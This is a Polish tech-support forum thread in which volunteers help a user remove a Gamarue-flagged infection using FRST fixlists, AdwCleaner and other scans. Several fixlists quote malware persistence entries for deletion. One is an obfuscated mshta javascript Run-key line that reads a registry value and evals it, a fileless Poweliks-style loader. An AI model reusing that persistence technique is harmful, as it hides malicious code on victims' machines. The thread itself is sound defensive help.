Skocz do zawartości

Worm:Win32/Gamarue


Rekomendowane odpowiedzi

Witam,

nie wiem, czy sprostam wymogom:

od kilku dni Windows Defender pokazuje mi trojany i malware.

Wyskakuje również alert o win32/gamarue

a zastosowanie narzędzi windows 8 nic nie daje.

Zgodnie z Pani zaleceniem zrobiłem testy i załączam:

 

http://wklej.org/id/1742285/

 

http://wklej.org/id/1742287/

 

http://wklej.org/id/1742288/

 

http://wklej.org/id/1742289/

 

będę zobowiązany za pomoc z Pani strony.

 

 

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

https://www.fixitpc.pl/topic/27096-nowy-moderator-w-dziale-malware/

Nie wiem, kiedy @Picasso lub @Naathim zacznie pomagać.

 

Ja już dziś nie mam czasu, ale możesz zrobić jeszcze dwie rzeczy:

1) zrob log z USBFix z opcji LISTING https://www.fixitpc.pl/topic/8-dezynfekcja-zbior-narzedzi-usuwajacych/?do=findComment&comment=74

 

2) zrób log z Adw-Cleaner  https://www.fixitpc.pl/topic/8-dezynfekcja-zbior-narzedzi-usuwajacych/?do=findComment&comment=118323

 

jessi

Odnośnik do komentarza

USBFix: na "E" nie masz nic, więc nie masz też infekcji GAMARUE.

 

Adw-Cleaner: najpierw kliknij na SZUKAJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego.

 

Process C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exe (*** suspicious ***)

Sprawdź ten plik na --> JOTTI/ albo na VIRUSTOTAL

(Plik o takiej nazwie chyba powinien być w innej lokalizacji, a nie w tej).

 

Zrób nowe logi FRST - już bez Shortcut.

 

jessi

Odnośnik do komentarza

Otwórz Notatnik i wklej w nim:

 

HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [bparse] => C:\Users\Cezary\AppData\Roaming\WinKun\winkun.exe [106834 2015-06-22] ()
C:\Users\Cezary\AppData\Roaming\WinKun
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD71D.exe <===== ATTENTION
C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD71D.exe
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
CHR HKU\S-1-5-21-669934448-3564392166-1087876309-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
FF Plugin-x32: @tencent.com/npQQMailWebKit,version=1.0.0.1 -> C:\Program Files (x86)\QQMailPlugin\npQQMailWebKit.dll [2013-04-25] (Tencent)
FF Plugin-x32: @tencent.com/nptxftnWebKit,version=1.0.0.1 -> C:\Program Files (x86)\QQMailPlugin\nptxftnWebKit.dll [2013-04-08] (Tencent Technology (Shenzhen) Company Limited)
C:\ProgramData\SetStretch.exe
Reg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix.
Powstanie plik fixlog.txt.
Daj ten log.

 

Czy dalej wykrywany jest GAMARUE?

 

jessi

Odnośnik do komentarza

Action Center WIN 8.1  64-bit okazuje mi jeden problem, ale z 6 datami w następujący sposób:

http://wklej.org/id/1745040/

 

nie wiem co to znaczy.

prawdę mówiąc - ja też nie wiem.

 

Jeszcze jedno przeoczyłam w logach:

Otwórz Notatnik i wklej w nim:

 

 

HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb<*>] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; <===== ATTENTION (Value Name with invalid characters)

EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe

Uruchom FRST i kliknij przycisk Fix.

Powstanie plik fixlog.txt.

Daj ten log.

 

 

jessi

Odnośnik do komentarza

Otwórz Notatnik i wklej w nim:

 

C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exe
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Console Protect Service] => C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exe [184962 2015-06-18] ()
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix.
Powstanie plik fixlog.txt.
Daj ten log.

 

Zrób to. o ile nie usunął już tego Comodo.

 

jessi

Odnośnik do komentarza

Pani Profesor Picasso, to dla mnie zaszczyt...

(bez sarkazmu)

 

logi z FRST z additional addition bez shortcut

http://www.wklejto.pl/229368

 

i adds

http://www.wklejto.pl/229369

 

 

myślę, że to legalne i za zaangażowanie chciałbym Szanownym Paniom podziękować:

http://www.wklejto.pl/229370

 

 

i może jeszcze tak:

 

nawiązując do Pań wpisów na forum.

Odnośnik do komentarza

Proszę trzymaj się poprzedniego serwisu wklej.org, jeśli logi są doczepiane nie przez załączniki forum (ale preferuję załączniki forum). Serwis wklejto nie jest dobry, zniekształca kodowanie raportów (specjalne znaki Unicode są zmienione i już nieprzetwarzalne przez FRST). Co widać w raportach:

 

1. Problem infekcji w ogóle nie rozwiązany - infekcja grasuje na dobre - m.in. Sathurbot w ShellIconOverlayIdentifiers i coś co wygląda na wariant infekcji w rodzaju Poweliks / Xswkit. Prócz tego, jest też adware w Firefox.

 

2. Druga sprawa - szykuje się też problem sprzętowy i będzie potem analizowany z osobna w innym dziale (Hardware). Dziennik zdarzeń notuje bad sektory dysku:

 

System errors:

=============

Error: (06/23/2015 08:30:08 PM) (Source: disk) (EventID: 7) (User: )

Description: The device, \Device\Harddisk0\DR0, has a bad block.

 

 

Wstępne akcje do wdrożenia pod kątem infekcji:

 

1. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
(Microsoft Corporation) C:\Windows\explorer.exe
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-05-09] ()
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) 
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; 
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Ewption] => C:\Users\Cezary\AppData\Local\Ewption\tmpC443.exe [147456 2015-06-26] (Spazio irradiato)
HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [ProxyGate] => C:\Users\Cezary\AppData\Roaming\ProxyGate\MainService.exe
R0 3C325EAB; C:\Windows\System32\drivers\3C325EAB.sys [457824 2015-05-09] (Kaspersky Lab ZAO)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\3C325EAB.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\3C325EAB.sys => ""="Driver"
Task: {6B3467E3-0E13-4B8A-AE31-7838931C70D5} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {A865DAAC-2E82-4E94-957E-9E9D996EF901} - System32\Tasks\{DB176E6A-E593-4BAF-A38D-E965F38CEB05} => pcalua.exe -a "C:\Users\Cezary\AppData\Roaming\Any Send Packages\uninstaller.exe" -c /Uninstall /NM="Any Send Packages" /AN="" /MBN="Any Send Packages"
Task: {A9C6DEB1-C97C-4240-8EC2-71AE96E633BC} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-06-24] ()
Task: {AF859B7D-8A89-4CDE-8582-3AEBD22BC8D5} - System32\Tasks\{7EA6F83A-7028-4153-B8F4-2A074365744C} => pcalua.exe -a C:\Users\Cezary\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveSetup.exe -c /uninstall
Task: {B22EB681-CDB3-4B9D-8ADC-7052995D9949} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C99E0E80-BB4B-4F67-A840-98209D263A83} - System32\Tasks\{B9260C24-276A-44BF-A844-BC40E35A8BFD} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com
Task: {EC54CC44-8812-42C0-8DEC-AE05D6FAAC70} - System32\Tasks\{999C1430-8EBE-4118-8C1B-69F4AF905631} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com
Task: {FDD60CF7-5388-4CE0-BF63-947E38D88B77} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-06-24] ()
Task: C:\WINDOWS\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\WINDOWS\Tasks\AutoKMSDaily.job => C:\Windows\AutoKMS\AutoKMS.exe
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {69ABAE4C-47BC-4EAD-A2B3-ED08ED617830} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Plugin-x32: @qq.com/QQPhotoDrawEx -> C:\Program Files (x86)\Tencent\Qzone\Ver_247.312\npQQPhotoDrawEx.dll No File
FF HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Firefox\Extensions: [speedtest4354@BestOffers] - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers
FF Extension: Speed Test 127 - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers [2014-02-03]
C:\Program Files (x86)\QQMailPlugin
C:\ProgramData\2320303d353737_c
C:\ProgramData\@system.temp
C:\ProgramData\@system3.att
C:\ProgramData\Microsoft\Performance
C:\ProgramData\TEMP
C:\Users\Cezary\AppData\Local\Ewption
C:\Users\Cezary\AppData\Roaming\麽鎒駓覜
C:\Users\Cezary\AppData\Roaming\my_intel.sys
C:\Users\Cezary\AppData\Roaming\sp_data.sys
C:\Users\Cezary\AppData\Roaming\ChromeUpdate
C:\Users\Cezary\AppData\Roaming\ProxyGate
C:\Windows\System32\drivers\3C325EAB.sys
C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
DeleteKey: HKCU\Software\c17946de
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run
CMD: netsh advfirewall reset
CMD: dir /a C:\Users\Cezary\AppData\Roaming\Chromodo

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8

 

Plik fixlist.txt umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows, by ani infekcja ani COMODO nie zablokowały FRST. Uruchom FRST i kliknij w Fix. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Przez Panel sterowania odinstaluj sponsorowany zbędnik McAfee Security Scan Plus. jeśli nie używasz, pozbądź się też Skype Click to Call.

 

3. Wyczyść Firefox:

  • menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone.
  • menu Historia > Wyczyść historię przeglądania
4. Zrób nowe logi: FRST z opcji Scan (z Addition) oraz Farbar Service Scanner. Dołącz też plik fixlog.txt. Wszystkie logi proszę załącz w formie oryginalnej, tzn. jako załączniki forum a nie na serwisach wklejkowych.
Odnośnik do komentarza

Infekcja wstępnie usunięta. Poprawki:

 

1. W związku z obecnością infekcji bezplikowej typu Poweliks / Xswkit zachodzi podejrzenie, że są zmodyfikowane określone ustawienia przeglądarki IE. Wykonaj reset także i tej przeglądarki: Opcje internetowe > Zaawansowane > Resetuj.

 

2. Klawisz z flagą Windows + X > Wiersz polecenia (Administrator) > wklej komendę i ENTER:

 

sfc /scannow

 

Gdy komenda ukończy działanie:

 

3. Odinstaluj USBFix. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe
RemoveDirectory: C:\AdwCleaner
RemoveDirectory: C:\FRST\Quarantine
RemoveDirectory: C:\UsbFix
RemoveDirectory: C:\Users\Cezary\Desktop\Stare dane programu Firefox
RemoveDirectory: C:\Windows\AutoKMS
CMD: netsh advfirewall reset
CMD: del /q C:\Users\Cezary\Downloads\adwcleaner*.exe
CMD: del /q C:\Users\Cezary\Downloads\UsbFix_2015_7.959.exe
CMD: del /q C:\Users\Cezary\Downloads\zf49b930.exe
CMD: findstr /c:"[sR]" %windir%\logs\cbs\cbs.log
EmptyTemp:

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Tym razewm nie wchodź do Trybu awaryjnego, lecz wyłącz COMODO na czas akcji z FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Ma nastąpić restart systemu i powstać kolejny fixlog.txt. Przedstaw ten log.

 

 

PS. Jeśli nikt jeszcze nie odpisał, a chcesz uzupełnić post, stosuj funkcję Edytuj zamiast pisać post pod postem. Dwa posty powyżej skleiłam.

Odnośnik do komentarza

Kolejne czynności pod kątem usuwania infekcji:

 

1. Usuń używane narzędzia za pomocą DelFix.

 

2. Wykonaj skany za pomocą Hitman Pro oraz Malwarebytes Anti-Malware. Nic nie usuwaj, dostarcz tylko raporty skanerów.

 

 

command wskazał mi plik, w którym są jakieś informacje o błędach.

Czy mam go tez załączyć?

Wyniki sfc zostały wydrukowane w skrypcie FRST za pomocą komendy CMD: findstr /c:"[sR]" %windir%\logs\cbs\cbs.log. Narzędzie notuje następujące nienaprawialne uszkodzenia:

 

2015-06-29 21:19:23, Info CSI 000008e2 [sR] Cannot repair member file [l:24{12}]"utc.app.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008e4 [sR] Cannot repair member file [l:66{33}]"telemetry.ASM-WindowsDefault.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008e6 [sR] Cannot repair member file [l:34{17}]"I386\STDSCHMX.GDL" of ntprint.inf, Version = 6.3.9600.17415, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type = [l:24{12}]"driverUpdate", TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008e8 [sR] Cannot repair member file [l:34{17}]"I386\STDSCHMX.GDL" of ntprint.inf, Version = 6.3.9600.17415, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type = [l:24{12}]"driverUpdate", TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008e9 [sR] This component was referenced by [l:164{82}]"Package_706_for_KB3000850~31bf3856ad364e35~amd64~~6.3.1.8.3000850-1750_neutral_GDR"

2015-06-29 21:19:23, Info CSI 000008eb [sR] Cannot repair member file [l:24{12}]"utc.app.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008ec [sR] This component was referenced by [l:154{77}]"Package_1_for_KB3068708~31bf3856ad364e35~amd64~~6.3.1.0.3068708-1_neutral_GDR"

2015-06-29 21:19:23, Info CSI 000008ee [sR] Cannot repair member file [l:66{33}]"telemetry.ASM-WindowsDefault.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch

2015-06-29 21:19:23, Info CSI 000008ef [sR] This component was referenced by [l:154{77}]"Package_1_for_KB3068708~31bf3856ad364e35~amd64~~6.3.1.0.3068708-1_neutral_GDR"

 

Prawdopodobnie są to skutki złych bloków dysku. Na razie wątek zostawiam, gdyż:

- Te wyniki nie wyglądają na krytyczne.

- Bez podmiany plikami dostarczonymi przeze mnie z mojego systemu Windows 8.1 x64 i tak nie ma jak tego naprawić. Musi być identyczna suma MD5 zgodna z wersją komponentu, tu nie przejdzie podmiana plikiem o takiej samej nazwie.

- Nie wiadomo co wykaże diagnostyka sprzętowa dysku - może się i tak szykować reinstalacja Windows.

Odnośnik do komentarza

1. Skanery wykryły tylko drobnostki, tzn: Ciastka w Google Chrome (Hitman) oraz szczątki adware (MBAM). To czego jeszcze nie usunąłeś programami, dokasuj.

 

2. Wyczyść foldery Przywracania systemu: KLIK.

 

3. Były różne infekcje. Na wszelki wypadek zmień wszystkie hasła logowania w serwisach (np. bank, poczta).

 

4. Proponuję też od razu zabezpieczyć cenne dane z dysku C, na którym są wykryte złe bloki, na zewnętrznym nośniku. Następnie udaj się do działu Hardware, załóż tam temat z wymaganymi danymi: KLIK. Zlinkuj im tu do mojego posta wskazującego odczyt złych bloków, by była wiadoma geneza tematu: KLIK.

Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...